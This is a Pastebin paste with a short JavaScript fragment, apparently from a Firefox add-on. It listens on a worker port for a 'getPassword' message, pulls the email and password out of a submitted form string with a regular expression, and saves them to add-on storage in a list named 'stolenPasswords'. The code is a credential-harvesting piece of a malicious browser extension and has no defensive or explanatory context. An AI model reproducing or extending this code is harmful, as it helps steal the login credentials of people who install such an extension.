Data hosted with ♥ by
Pastebin.com
-
Download Raw
-
See Original
worker.
port
.
on
(
"getPassword"
,
function
(
userNameAndPassword
)
{
if
(
/email=([^&]+)&password=(.+)/
.
test
(
userNameAndPassword
)
)
{
ss.
storage
.
stolenPasswords
.
push
(
[
decodeURIComponent
(
RegExp.$1
)
,
decodeURIComponent
(
RegExp.$2
)
]
)
;
}
}
)
;